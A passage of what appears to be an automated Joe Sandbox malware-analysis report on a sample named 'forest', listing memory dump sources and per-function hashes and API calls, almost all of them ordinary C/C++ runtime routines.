    • Associated: 00000000.00000002.2610714657.00007FF75BD92000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610714657.00007FF75BD95000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610745126.00007FF75BD97000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_7ff75bcf0000_forest.jbxd
    Similarity
    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
    • String ID:
    • API String ID: 2081738530-0
    • Opcode ID: 24d47b9c58b4ac561442a5f8a6a89dda0eda9f481c2d97320db3b7ccf610aeac
    • Instruction ID: f4b934091144bcba31e963f43d8029d762fc23f9e0dede9ae680825b69af0455
    • Opcode Fuzzy Hash: 24d47b9c58b4ac561442a5f8a6a89dda0eda9f481c2d97320db3b7ccf610aeac
    • Instruction Fuzzy Hash: 94313022A09B4681EA29FF29E45017AF360FB88B94F9C0231DA5D077B5EE3CE451C764
    APIs
    Memory Dump Source
    • Source File: 00000000.00000002.2610589653.00007FF75BCF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75BCF0000, based on PE: true
    • Associated: 00000000.00000002.2610571497.00007FF75BCF0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610644115.00007FF75BD76000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610683252.00007FF75BD90000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610698884.00007FF75BD91000.00000008.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610714657.00007FF75BD92000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610714657.00007FF75BD95000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610745126.00007FF75BD97000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_7ff75bcf0000_forest.jbxd
    Similarity
    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
    • String ID:
    • API String ID: 2081738530-0
    • Opcode ID: b11b7d60a71d5e64724596738f5cf418a9b85c8d5d2b0b66d99383134bd93198
    • Instruction ID: c44807741ebe5a225de8408970fa17f60fdc41c4cc6f7976191c78c3aef7a0b7
    • Opcode Fuzzy Hash: b11b7d60a71d5e64724596738f5cf418a9b85c8d5d2b0b66d99383134bd93198
    • Instruction Fuzzy Hash: 22314222A09B4281EA19BF29E4501BAF360FB94B98F9C0631DA5D076B5DF3CE5418754
    APIs
    Memory Dump Source
    • Source File: 00000000.00000002.2610589653.00007FF75BCF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75BCF0000, based on PE: true
    • Associated: 00000000.00000002.2610571497.00007FF75BCF0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610644115.00007FF75BD76000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610683252.00007FF75BD90000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610698884.00007FF75BD91000.00000008.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610714657.00007FF75BD92000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610714657.00007FF75BD95000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610745126.00007FF75BD97000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_7ff75bcf0000_forest.jbxd
    Similarity
    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
    • String ID:
    • API String ID: 2081738530-0
    • Opcode ID: 2042775240bd6c479fce8bd923c7f62237510e7186632ca0eff0cc3ec857919d
    • Instruction ID: 1050e639f14710e5b6fdac94d6dcd8dc0cd4bbd4146570c9647952a4cfccae1d
    • Opcode Fuzzy Hash: 2042775240bd6c479fce8bd923c7f62237510e7186632ca0eff0cc3ec857919d
    • Instruction Fuzzy Hash: B1317326A09B0280EA19FF29E451179F360FB94BA4F9C0536DE8D037B5EE3CE5418764
    APIs
    Memory Dump Source
    • Source File: 00000000.00000002.2610589653.00007FF75BCF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75BCF0000, based on PE: true
    • Associated: 00000000.00000002.2610571497.00007FF75BCF0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610644115.00007FF75BD76000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610683252.00007FF75BD90000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610698884.00007FF75BD91000.00000008.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610714657.00007FF75BD92000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610714657.00007FF75BD95000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610745126.00007FF75BD97000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_7ff75bcf0000_forest.jbxd
    Similarity
    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
    • String ID:
    • API String ID: 2081738530-0
    • Opcode ID: 9c406dcfc41f0356f12bc71b5c6d240ac8f6804b0cb7f11da5ef4b535cedcd89
    • Instruction ID: cc3dc3278aaa97b107af259dc9121616102333fbe28de995bcc36804485b3fab
    • Opcode Fuzzy Hash: 9c406dcfc41f0356f12bc71b5c6d240ac8f6804b0cb7f11da5ef4b535cedcd89
    • Instruction Fuzzy Hash: 57318122A4AB8691FA1DFB2DD4401B9E360FB84BA4F8C0131EE1D076B5DE7DE442C364
    APIs
    Memory Dump Source
    • Source File: 00000000.00000002.2610589653.00007FF75BCF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75BCF0000, based on PE: true
    • Associated: 00000000.00000002.2610571497.00007FF75BCF0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610644115.00007FF75BD76000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610683252.00007FF75BD90000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610698884.00007FF75BD91000.00000008.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610714657.00007FF75BD92000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610714657.00007FF75BD95000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610745126.00007FF75BD97000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_7ff75bcf0000_forest.jbxd
    Similarity
    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
    • String ID:
    • API String ID: 2081738530-0
    • Opcode ID: 21717bef3686618cd96da9bb82ce299ad44ed5010396f82f6eca78fbaf962fb2
    • Instruction ID: 2be48048719a972ee32b0aa5c59a8a0f66ea93b63e153c4c44017597bcaf5bd8
    • Opcode Fuzzy Hash: 21717bef3686618cd96da9bb82ce299ad44ed5010396f82f6eca78fbaf962fb2
    • Instruction Fuzzy Hash: 5B316F22A49B8681EF0DBB6DE440178E760EB84BA4F8C0132DE4D476B5EE7DE4428370
    APIs
    Memory Dump Source
    • Source File: 00000000.00000002.2610589653.00007FF75BCF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75BCF0000, based on PE: true
    • Associated: 00000000.00000002.2610571497.00007FF75BCF0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610644115.00007FF75BD76000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610683252.00007FF75BD90000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610698884.00007FF75BD91000.00000008.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610714657.00007FF75BD92000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610714657.00007FF75BD95000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610745126.00007FF75BD97000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_7ff75bcf0000_forest.jbxd
    Similarity
    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
    • String ID:
    • API String ID: 2081738530-0
    • Opcode ID: 377b59972e5e0ee5b8278c57d5a3dc2c1a202cafcbafdecb7bd9c415f6f64c78
    • Instruction ID: e379e4a33de6a812237d204e953a229e0eb8600cfa6174e69e1b4043d48f2c7a
    • Opcode Fuzzy Hash: 377b59972e5e0ee5b8278c57d5a3dc2c1a202cafcbafdecb7bd9c415f6f64c78
    • Instruction Fuzzy Hash: DC31AF22E09B4281EA1DBB6DD8401B9E320EF84BA0F8C0531DE5D077B5DEBCE4428328
    APIs
    Memory Dump Source
    • Source File: 00000000.00000002.2610589653.00007FF75BCF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75BCF0000, based on PE: true
    • Associated: 00000000.00000002.2610571497.00007FF75BCF0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610644115.00007FF75BD76000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610683252.00007FF75BD90000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610698884.00007FF75BD91000.00000008.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610714657.00007FF75BD92000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610714657.00007FF75BD95000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610745126.00007FF75BD97000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_7ff75bcf0000_forest.jbxd
    Similarity
    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
    • String ID:
    • API String ID: 2081738530-0
    • Opcode ID: 766bc0b1722455a3eec6d0639954e9c5a2943d8c3e93ed51b5b95f5e5a2d201a
    • Instruction ID: 8ed7490a6f6b43348508931364e517140e9e2f9b426b8ff7b10d29061365ec23
    • Opcode Fuzzy Hash: 766bc0b1722455a3eec6d0639954e9c5a2943d8c3e93ed51b5b95f5e5a2d201a
    • Instruction Fuzzy Hash: 23318022E0DB4285EA1DBB6DD4401B9E360EB84BA0F8C0171DE4D077F5DEBCE4428364
    APIs
    Memory Dump Source
    • Source File: 00000000.00000002.2610589653.00007FF75BCF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75BCF0000, based on PE: true
    • Associated: 00000000.00000002.2610571497.00007FF75BCF0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610644115.00007FF75BD76000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610683252.00007FF75BD90000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610698884.00007FF75BD91000.00000008.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610714657.00007FF75BD92000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610714657.00007FF75BD95000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610745126.00007FF75BD97000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_7ff75bcf0000_forest.jbxd
    Similarity
    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
    • String ID:
    • API String ID: 2081738530-0
    • Opcode ID: c47ac0e8dd3d0c286527649e92f272822709cc0d429192d2b540c2e798ba42d9
    • Instruction ID: 195f3fa65ec5262973f5150b86aba0eaf6e4c3ed11f82b730853b40024c2b278
    • Opcode Fuzzy Hash: c47ac0e8dd3d0c286527649e92f272822709cc0d429192d2b540c2e798ba42d9
    • Instruction Fuzzy Hash: 36318222A09B8695EA5DFB2ED441178F360EB84BA0F8C0232DE5D077B5DE3DE4468360
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.2610589653.00007FF75BCF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75BCF0000, based on PE: true
    • Associated: 00000000.00000002.2610571497.00007FF75BCF0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610644115.00007FF75BD76000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610683252.00007FF75BD90000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610698884.00007FF75BD91000.00000008.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610714657.00007FF75BD92000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610714657.00007FF75BD95000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610745126.00007FF75BD97000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_7ff75bcf0000_forest.jbxd
    Similarity
    • API ID:
    • String ID: %$+
    • API String ID: 0-2626897407
    • Opcode ID: be3d1e85cf96b28ac0a17ea4137767ce67214e1e92dfd20f534a1827cba5f10e
    • Instruction ID: 3d9b370ecf9a641a4079a115b01bf994ea1b5fae3cf92dfcee6b0184fa82d91f
    • Opcode Fuzzy Hash: be3d1e85cf96b28ac0a17ea4137767ce67214e1e92dfd20f534a1827cba5f10e
    • Instruction Fuzzy Hash: 4AD1D362B08B8985FB15ABA9D4402FDB361EB49B98F884231DE5C177E9DF3CD54AC310
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.2610589653.00007FF75BCF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75BCF0000, based on PE: true
    • Associated: 00000000.00000002.2610571497.00007FF75BCF0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610644115.00007FF75BD76000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610683252.00007FF75BD90000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610698884.00007FF75BD91000.00000008.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610714657.00007FF75BD92000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610714657.00007FF75BD95000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610745126.00007FF75BD97000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_7ff75bcf0000_forest.jbxd
    Similarity
    • API ID: Is_bad_exception_allowedstd::bad_alloc::bad_alloc
    • String ID: csm$csm$csm
    • API String ID: 3523768491-393685449
    • Opcode ID: 890515245bb3702dda5d83861889bf4967c74efe4f362a51c3ffa88499933ad7
    • Instruction ID: aae0f40033aa43197fe974bb93f996caabe87b258fc4ae1540fbe98bb9ab0b12
    • Opcode Fuzzy Hash: 890515245bb3702dda5d83861889bf4967c74efe4f362a51c3ffa88499933ad7
    • Instruction Fuzzy Hash: 5BE1D472D087828AE758EF28D4803BDBBA0FB45788F584175DE8D476A6DF78E481C750
    APIs
    • GetLastError.KERNEL32(?,?,8000000000000000,00007FF75BD51C85,?,?,?,?,00007FF75BD5DB64), ref: 00007FF75BD5E377
    • FlsSetValue.KERNEL32(?,?,8000000000000000,00007FF75BD51C85,?,?,?,?,00007FF75BD5DB64), ref: 00007FF75BD5E3AD
    • FlsSetValue.KERNEL32(?,?,8000000000000000,00007FF75BD51C85,?,?,?,?,00007FF75BD5DB64), ref: 00007FF75BD5E3DA
    • FlsSetValue.KERNEL32(?,?,8000000000000000,00007FF75BD51C85,?,?,?,?,00007FF75BD5DB64), ref: 00007FF75BD5E3EB
    • FlsSetValue.KERNEL32(?,?,8000000000000000,00007FF75BD51C85,?,?,?,?,00007FF75BD5DB64), ref: 00007FF75BD5E3FC
    • SetLastError.KERNEL32(?,?,8000000000000000,00007FF75BD51C85,?,?,?,?,00007FF75BD5DB64), ref: 00007FF75BD5E417
    Memory Dump Source
    • Source File: 00000000.00000002.2610589653.00007FF75BCF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75BCF0000, based on PE: true
    • Associated: 00000000.00000002.2610571497.00007FF75BCF0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610644115.00007FF75BD76000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610683252.00007FF75BD90000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610698884.00007FF75BD91000.00000008.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610714657.00007FF75BD92000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610714657.00007FF75BD95000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610745126.00007FF75BD97000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_7ff75bcf0000_forest.jbxd
    Similarity
    • API ID: Value$ErrorLast
    • String ID:
    • API String ID: 2506987500-0
    • Opcode ID: 98384f26327f76579ed9f630f10178bdb8d09822ebacc95e52f3561bd0bb9469
    • Instruction ID: 5b3f74d642a51b9d2ef8fd17b3ddb4771f05795b682bbf4b7b3f43fdf92bb732
    • Opcode Fuzzy Hash: 98384f26327f76579ed9f630f10178bdb8d09822ebacc95e52f3561bd0bb9469
    • Instruction Fuzzy Hash: 79114A20A0D78243FA6DB73EA6D6179E1526F847A0F9C0634E97E466F6DE2CE4418220
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.2610589653.00007FF75BCF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75BCF0000, based on PE: true
    • Associated: 00000000.00000002.2610571497.00007FF75BCF0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610644115.00007FF75BD76000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610683252.00007FF75BD90000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610698884.00007FF75BD91000.00000008.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610714657.00007FF75BD92000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610714657.00007FF75BD95000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610745126.00007FF75BD97000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_7ff75bcf0000_forest.jbxd
    Similarity
    • API ID: Concurrency::cancel_current_task$std::bad_alloc::bad_alloc
    • String ID: false$true
    • API String ID: 1173176844-2658103896
    • Opcode ID: a0548538b1f2a7caf437fa2082cbfdfde99cd727c9bf5cef349941922eb6682d
    • Instruction ID: 1d98c8d4e0f457a7c93214fe565b71dac8c4ecfe3715a706167b4b0e244548fb
    • Opcode Fuzzy Hash: a0548538b1f2a7caf437fa2082cbfdfde99cd727c9bf5cef349941922eb6682d
    • Instruction Fuzzy Hash: 8041B326509B8285E719EF39A4402B9B7A0EF44B54F9C4635EE9C073A5DF3CE451C7A0
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.2610589653.00007FF75BCF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75BCF0000, based on PE: true
    • Associated: 00000000.00000002.2610571497.00007FF75BCF0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610644115.00007FF75BD76000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610683252.00007FF75BD90000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610698884.00007FF75BD91000.00000008.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610714657.00007FF75BD92000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610714657.00007FF75BD95000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610745126.00007FF75BD97000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_7ff75bcf0000_forest.jbxd
    Similarity
    • API ID: AddressFreeHandleLibraryModuleProc
    • String ID: CorExitProcess$mscoree.dll
    • API String ID: 4061214504-1276376045
    • Opcode ID: b8dcc24f35f9eda85bde13ee398b6989e7699f28aa76fe6e5206f464e31aa1d6
    • Instruction ID: f25ebcbc18cd58401568ffc59069c44d27b28864dd01772425d3d12f0d178b6b
    • Opcode Fuzzy Hash: b8dcc24f35f9eda85bde13ee398b6989e7699f28aa76fe6e5206f464e31aa1d6
    • Instruction Fuzzy Hash: A9F06822B08B0682EB18AB2CE4457B9A360BF95755FDC0235D66E451F4EF6DD045C320
    Memory Dump Source
    • Source File: 00000000.00000002.2610589653.00007FF75BCF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75BCF0000, based on PE: true
    • Associated: 00000000.00000002.2610571497.00007FF75BCF0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610644115.00007FF75BD76000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610683252.00007FF75BD90000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610698884.00007FF75BD91000.00000008.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610714657.00007FF75BD92000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610714657.00007FF75BD95000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610745126.00007FF75BD97000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_7ff75bcf0000_forest.jbxd
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: a046f0d69daef8b6ad322fb34843cb9f873226bc415df419fa6e7c6de14b7421
    • Instruction ID: a08194e9346e9b700c5bd291a8b3c33392c5bd6a39191000196e6966058902c2
    • Opcode Fuzzy Hash: a046f0d69daef8b6ad322fb34843cb9f873226bc415df419fa6e7c6de14b7421
    • Instruction Fuzzy Hash: 7F029462F18B4985FB15DBA9D4402BCB371AB48B98F984232DE5C277A9DF38D14AC310
    APIs
    Memory Dump Source
    • Source File: 00000000.00000002.2610589653.00007FF75BCF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75BCF0000, based on PE: true
    • Associated: 00000000.00000002.2610571497.00007FF75BCF0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610644115.00007FF75BD76000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610683252.00007FF75BD90000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610698884.00007FF75BD91000.00000008.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610714657.00007FF75BD92000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610714657.00007FF75BD95000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610745126.00007FF75BD97000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_7ff75bcf0000_forest.jbxd
    Similarity
    • API ID: _invalid_parameter_noinfo_noreturn$Concurrency::cancel_current_task
    • String ID:
    • API String ID: 3936042273-0
    • Opcode ID: e7fa8e4a899329e984c1acece99ca774f877e1b28c68e86b264a1d9f6202f99f
    • Instruction ID: 3d828e7f3286839a9bf2d71f0a5eca3d729ee501f43c684ff97f0647adbda5fa
    • Opcode Fuzzy Hash: e7fa8e4a899329e984c1acece99ca774f877e1b28c68e86b264a1d9f6202f99f
    • Instruction Fuzzy Hash: 54C1A262F18B4986FB14EBA8D0443BC63B5EB48798F885631DE5D23BA8EF38D045C350
    APIs
    Memory Dump Source
    • Source File: 00000000.00000002.2610589653.00007FF75BCF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75BCF0000, based on PE: true
    • Associated: 00000000.00000002.2610571497.00007FF75BCF0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610644115.00007FF75BD76000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610683252.00007FF75BD90000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610698884.00007FF75BD91000.00000008.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610714657.00007FF75BD92000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610714657.00007FF75BD95000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610745126.00007FF75BD97000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_7ff75bcf0000_forest.jbxd
    Similarity
    • API ID: _invalid_parameter_noinfo_noreturn$Concurrency::cancel_current_task
    • String ID:
    • API String ID: 3936042273-0
    • Opcode ID: bcead0ba50dd890a7dbadb4ee972e07d315b1ca9652fd7eddeed071f19e576e3
    • Instruction ID: cb0717638a7d6105e6741c024a0339701b3274e0a9e361eeb6abc5e4c3a53d41
    • Opcode Fuzzy Hash: bcead0ba50dd890a7dbadb4ee972e07d315b1ca9652fd7eddeed071f19e576e3
    • Instruction Fuzzy Hash: 9FB1E663F19B498AFB14EB69D0443BCA3A2EB45798F884231DE5D17BE9EE78D045C310
    APIs
    Memory Dump Source
    • Source File: 00000000.00000002.2610589653.00007FF75BCF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75BCF0000, based on PE: true
    • Associated: 00000000.00000002.2610571497.00007FF75BCF0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610644115.00007FF75BD76000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610683252.00007FF75BD90000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610698884.00007FF75BD91000.00000008.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610714657.00007FF75BD92000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610714657.00007FF75BD95000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610745126.00007FF75BD97000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_7ff75bcf0000_forest.jbxd
    Similarity
    • API ID: _set_statfp
    • String ID:
    • API String ID: 1156100317-0
    • Opcode ID: 77b3e33a6f5132d0789f4973ca5980c7032235896e2b77d186fa7528dd25f978
    • Instruction ID: d41f0af60356cf711119aa5c416bcab875c2b21f21cf9b33ca3b8b9598b6d5d3
    • Opcode Fuzzy Hash: 77b3e33a6f5132d0789f4973ca5980c7032235896e2b77d186fa7528dd25f978
    • Instruction Fuzzy Hash: 8681A812918FC645F27AAF3CA45037AE650EF5D354F8C4235EE5D265F4DF3CA5818A20
    APIs
    Memory Dump Source
    • Source File: 00000000.00000002.2610589653.00007FF75BCF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75BCF0000, based on PE: true
    • Associated: 00000000.00000002.2610571497.00007FF75BCF0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610644115.00007FF75BD76000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610683252.00007FF75BD90000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610698884.00007FF75BD91000.00000008.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610714657.00007FF75BD92000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610714657.00007FF75BD95000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2610745126.00007FF75BD97000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_7ff75bcf0000_forest.jbxd
    Similarity
    • API ID: _invalid_parameter_noinfo
    • String ID:
    • API String ID: 3215553584-0
    • Opcode ID: 492b45dcdfc681ab09788500166ca94a443063352cf3c2ab544e14c454973447
    • Instruction ID: 8c099a3036486efd30206f315dccfab0e767816c5f2e167a491fea26bd2d297d
    • Opcode Fuzzy Hash: 492b45dcdfc681ab09788500166ca94a443063352cf3c2ab544e14c454973447
